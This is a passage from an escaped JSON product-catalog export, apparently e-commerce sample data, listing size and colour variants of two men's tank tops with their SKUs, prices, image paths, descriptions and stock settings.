Category\",\"product_websites\":\"base\",\"name\":\"Argus All-Weather Tank-M-Gray\",\"description\":\"<p>The Argus All-Weather Tank is sure to become your favorite base layer or go-to cover for hot outdoor workouts. With its subtle reflective safely trim, you can even wear it jogging on urban evenings.<\\/p>\\n<p>&bull; Dark gray polyester spandex tank.<br \\/>&bull; Reflective details for nighttime visibility. <br \\/>&bull; Stash pocket.<br \\/>&bull; Anti-chafe flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"argus-all-weather-tank-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt07-gray_back.jpg\",\"image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"645\":{\"sku\":\"MT07-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Argus All-Weather Tank-L-Gray\",\"description\":\"<p>The Argus All-Weather Tank is sure to become your favorite base layer or go-to cover for hot outdoor workouts. With its subtle reflective safely trim, you can even wear it jogging on urban evenings.<\\/p>\\n<p>&bull; Dark gray polyester spandex tank.<br \\/>&bull; Reflective details for nighttime visibility. <br \\/>&bull; Stash pocket.<br \\/>&bull; Anti-chafe flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"argus-all-weather-tank-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt07-gray_back.jpg\",\"image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"646\":{\"sku\":\"MT07-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Argus All-Weather Tank-XL-Gray\",\"description\":\"<p>The Argus All-Weather Tank is sure to become your favorite base layer or go-to cover for hot outdoor workouts. With its subtle reflective safely trim, you can even wear it jogging on urban evenings.<\\/p>\\n<p>&bull; Dark gray polyester spandex tank.<br \\/>&bull; Reflective details for nighttime visibility. <br \\/>&bull; Stash pocket.<br \\/>&bull; Anti-chafe flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"argus-all-weather-tank-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt07-gray_back.jpg\",\"image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"647\":{\"sku\":\"MT07\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Argus All-Weather Tank\",\"description\":\"<p>The Argus All-Weather Tank is sure to become your favorite base layer or go-to cover for hot outdoor workouts. With its subtle reflective safely trim, you can even wear it jogging on urban evenings.<\\/p>\\n<p>&bull; Dark gray polyester spandex tank.<br \\/>&bull; Reflective details for nighttime visibility. <br \\/>&bull; Stash pocket.<br \\/>&bull; Anti-chafe flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Organic Cotton|Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MT07-XS-Gray,size=XS,color=Gray|sku=MT07-S-Gray,size=S,color=Gray|sku=MT07-M-Gray,size=M,color=Gray|sku=MT07-L-Gray,size=L,color=Gray|sku=MT07-XL-Gray,size=XL,color=Gray\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt07-gray_back.jpg\",\"image\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Organic Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"648\":{\"sku\":\"MT08-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Sparta Gym Tank-XS-Green\",\"description\":\"<p>The high performance Sparta Gym Tank is made with thin, light, merino wool and aims to be the perfect base layer or balmy weather running and fitness top.<\\/p>\\n<p>&bull; Green polyester tank.<br \\/>&bull; Ultra lightweight.<br \\/>&bull; Naturally odor-resistant.<br \\/>&bull; Close-to-body athletic fit.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sparta-gym-tank-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt08-green_alt1.jpg,\\/m\\/t\\/mt08-green_back.jpg\",\"image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt08-green_alt1.jpg,\\/m\\/t\\/mt08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"649\":{\"sku\":\"MT08-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Sparta Gym Tank-S-Green\",\"description\":\"<p>The high performance Sparta Gym Tank is made with thin, light, merino wool and aims to be the perfect base layer or balmy weather running and fitness top.<\\/p>\\n<p>&bull; Green polyester tank.<br \\/>&bull; Ultra lightweight.<br \\/>&bull; Naturally odor-resistant.<br \\/>&bull; Close-to-body athletic fit.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sparta-gym-tank-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt08-green_alt1.jpg,\\/m\\/t\\/mt08-green_back.jpg\",\"image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt08-green_alt1.jpg,\\/m\\/t\\/mt08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"650\":{\"sku\":\"MT08-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Sparta Gym Tank-M-Green\",\"description\":\"<p>The high performance Sparta Gym Tank is made with thin, light, merino wool and aims to be the perfect base layer or balmy weather running and fitness top.<\\/p>\\n<p>&bull; Green polyester tank.<br \\/>&bull; Ultra lightweight.<br \\/>&bull; Naturally odor-resistant.<br \\/>&bull; Close-to-body athletic fit.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sparta-gym-tank-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt08-green_alt1.jpg,\\/m\\/t\\/mt08-green_back.jpg\",\"image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt08-green_alt1.jpg,\\/m\\/t\\/mt08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"651\":{\"sku\":\"MT08-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Sparta Gym Tank-L-Green\",\"description\":\"<p>The high performance Sparta Gym Tank is made with thin, light, merino wool and aims to be the perfect base layer or balmy weather running and fitness top.<\\/p>\\n<p>&bull; Green polyester tank.<br \\/>&bull; Ultra lightweight.<br \\/>&bull; Naturally odor-resistant.<br \\/>&bull; Close-to-body athletic fit.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sparta-gym-tank-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt08-green_alt1.jpg,\\/m\\/t\\/mt08-green_back.jpg\",\"image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt08-green_alt1.jpg,\\/m\\/t\\/mt08-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"652\":{\"sku\":\"MT08-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Sparta Gym Tank-XL-Green\",\"description\":\"<p>The high performance Sparta Gym Tank is made with thin, light, merino wool and aims to be the perfect base layer or balmy weather running and fitness top.<\\/p>\\n<p>&bull; Green polyester tank.<br \\/>&bull; Ultra lightweight.<br \\/>&bull; Naturally odor-resistant.<br \\/>&bull; Close-to-body athletic fit.<br \\/>&bull; Chafe-resistant flatlock seams.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"sparta-gym-tank-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt08-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increm